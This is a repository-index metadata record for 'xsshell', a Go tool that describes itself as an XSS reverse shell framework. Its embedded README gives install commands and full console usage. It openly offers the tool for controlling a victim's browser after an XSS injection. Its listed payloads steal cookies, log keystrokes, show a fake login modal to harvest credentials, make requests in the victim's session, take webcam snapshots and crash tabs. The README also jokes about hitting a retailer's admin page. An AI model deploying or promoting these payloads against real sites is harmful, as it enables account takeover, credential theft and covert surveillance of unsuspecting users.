{"id":20846775,"url":"https://github.com/raz-varren/xsshell","last_synced_at":"2025-06-29T18:03:44.700Z","repository":{"id":78098534,"uuid":"159282148","full_name":"raz-varren/xsshell","owner":"raz-varren","description":"An XSS reverse shell framework","archived":false,"fork":false,"pushed_at":"2018-12-03T02:40:47.000Z","size":35,"stargazers_count":306,"open_issues_count":2,"forks_count":49,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-04-03T03:09:26.349Z","etag":null,"topics":["golang","javascript","reverse-shell","xss","xss-exploitation"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/raz-varren.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-11-27T05:42:58.000Z","updated_at":"2025-01-29T16:40:15.000Z","dependencies_parsed_at":"2023-03-03T22:45:38.840Z","dependency_job_id":null,"html_url":"https://github.com/raz-varren/xsshell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/raz-varren/xsshell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/raz-varren%2Fxsshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/raz-varren%2Fxsshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/raz-varren%2Fxsshell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/raz-varren%2Fxsshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/raz-varren","download_url":"https://codeload.github.com/raz-varren/xsshell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/raz-varren%2Fxsshell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262642959,"owners_count":23341816,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","javascript","reverse-shell","xss","xss-exploitation"],"created_at":"2024-11-18T02:17:56.280Z","updated_at":"2025-06-29T18:03:44.655Z","avatar_url":"https://github.com/raz-varren.png","language":"Go","readme":"XSShell\n=======\n\nXSShell is a cross-site-scripting reverse shell... Okay, well maybe it's not a true reverse shell, but it will allow you to interact in real time with an XSS victim's browser.\n\nJust run the xsshell binary to setup your listener endpoint, do your XSS thing to get the exploit js onto the victim's browser, and as soon as they run it you should see something like this popup in your console:\n\n```\n====== start socket: 1, header: AmaaKrM= ======\nsocket connected: 1\n user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 \n page url: http://example.com/ \n referrer: http://google.com/\n cookies: phpsessid=abababababababab\n====== end socket: 1, header: AmaaKrM= ======\n```\n\nOnce you have a connection you can execute any javascript file you want on the browser, and have that script return data to your console. This may not seem very useful at first, but it allows you to be more tactical and react in real time to the environment that the script is running on. Environments like say... an admin page used to approve and manage orders placed on a retail site :)\n\nXSShell also comes with a number of premade XSS payloads to use:\n\n- \\alert - send a js alert message\n- \\cs - get cookies and any updates to the cookies\n- \\gi - download all images on the page\n- \\kl - key logger\n- \\ll - list all links on the page\n- \\src - download the current page source\n- \\pfl - show the user a modal and prompt them to login\n- \\xhr - make xhr requests in the context of the victim's browser\n- \\ct - crash the victim's browser tab\n- \\wcs - attempt to take a snapshot from the victim's webcam (WARNING: most modern browsers will prompt for access to webcams)\n\nInstall\n-------\n\nTo install xsshell run:\n```bash\ngo get github.com/raz-varren/xsshell\ngo install github.com/raz-varren/xsshell\n```\n\nMods\n------\n\nIf you modify any of the JS files in this package, make sure you run:\n```bash\ngo generate github.com/raz-varren/xsshell...\ngo install github.com/raz-varren/xsshell\n```\n\nThis will ensure that the updated files are packed into the binary.\n\nUsage\n-----\n\nThe xsshell command:\n```\nxsshell -h\nUsage of xsshell:\n -cert string\n \tssl cert file\n -host string\n \twebsocket listen address\n -key string\n \tssl key file\n -log string\n \tspecify a log file to log all console communication\n -path string\n \twebsocket connection path (default \"/s\")\n -port string\n \twebsocket listen port (default \"8234\")\n -servdir string\n \tspecify a directory to serve files from. a file server will not be started if no directory is specified\n -servpath string\n \tspecify the base url path that you want to serve files from (default \"/static/\")\n -wrkdir string\n \tworking directory that will be used as the relative root path for any commands requiring user provided file paths (default \"./\")\n```\n\nStarting the shell console:\n```\nxsshell \nlistening for sockets on :8234, at url path: /s\nstarting console\ntype \\? to list available commands\nxsshell \u003e \nxsshell \u003e \\?\nxsshell \u003e \\help \\? \\h: list available commands\nxsshell \u003e \\alert: send an alert message to the target set\nxsshell \u003e usage: \\alert ALERT_MESSAGE\nxsshell \u003e \\cs: get the current cookies from the target set's current page and any cookie updates.\nxsshell \u003e \\ct: crash the target set's tab\nxsshell \u003e \\emd: return a list of media devices accessible to the target set's browser\nxsshell \u003e \\ex: print out the client exploit javascript\nxsshell \u003e \\exm: print out the minified version of the client exploit javascript\nxsshell \u003e \\gi: download all images on the target set's page. \nxsshell \u003e images will be stored in DOWNLOAD_DIR. \nxsshell \u003e relative file paths are relative to the path provided to -wrkdir\nxsshell \u003e usage: \\gi [DOWNLOAD_DIR]\nxsshell \u003e examples:\nxsshell \u003e \\gi\nxsshell \u003e \\gi /tmp/images\nxsshell \u003e \\gi imgdir\nxsshell \u003e \\kl: start a keylogger on the target set\nxsshell \u003e \\ll: list out any links found on the target set's currently open page\nxsshell \u003e \\pfl: open a modal on the target set's page prompting them for a username and password\nxsshell \u003e \\ps: print out socket info for all actively connected websockets\nxsshell \u003e \\q: exit this program\nxsshell \u003e \\sf: send a javascript file to the target set and execute it. \nxsshell \u003e any data can be returned from the target set by calling `this.send(\\\"return data string\\\");` in the script. \nxsshell \u003e relative file paths are relative to the path provided to -wrkdir\nxsshell \u003e usage: \\sf FILE_PATH\nxsshell \u003e \\sfl: resend the last file that was sent using \\sf, includes any new changes to the file\nxsshell \u003e \\src: get the target set's currently rendered page source\nxsshell \u003e \\st: set the websockets to target. one or more targets can be set with the following methods:\nxsshell \u003e * -targets all active websocket connections (default target set)\nxsshell \u003e 8 -target a single websocket connection belonging to that id number\nxsshell \u003e 1,2,8,10 -targets all websocket IDs in the comma separated list\nxsshell \u003e 4-16 -targets all websocket IDs from the lowest number listed to the highest number listed\nxsshell \u003e 4- -targets all websocket IDs that are greater than or equal to the listed number\nxsshell \u003e -16 -targets all websocket IDs that are less than or equal to the listed number\nxsshell \u003e usage: \\st TARGET_SET\nxsshell \u003e examples:\nxsshell \u003e \\st *\nxsshell \u003e \\st 2\nxsshell \u003e \\st 2,4,7\nxsshell \u003e \\st 10-15\nxsshell \u003e \\st 6-\nxsshell \u003e \\st -100\nxsshell \u003e \\wcs: attempt to take a snapshot from the target set's webcam, if one is available. \nxsshell \u003e images will be stored in DOWNLOAD_DIR. \nxsshell \u003e relative file paths are relative to the path provided to -wrkdir.\nxsshell \u003e NOTE: using this command may prompt the target set for webcam access. \nxsshell \u003e the target set may reject the prompt, or ignore it entirely.\nxsshell \u003e usage: \\ws [DOWNLOAD_DIR]\nxsshell \u003e examples:\nxsshell \u003e \\wcs /tmp/webcam_snaps\nxsshell \u003e \\wcs snaps\nxsshell \u003e \\xhr: send an xhr request from the target set's current page\nxsshell \u003e usage: \\xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]\nxsshell \u003e examples:\nxsshell \u003e \\xhr GET https://google.com/\nxsshell \u003e \\xhr POST https://google.com/ application/json {\"hello\": \"world\"}\nxsshell \u003e\n```\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fraz-varren%2Fxsshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fraz-varren%2Fxsshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fraz-varren%2Fxsshell/lists"}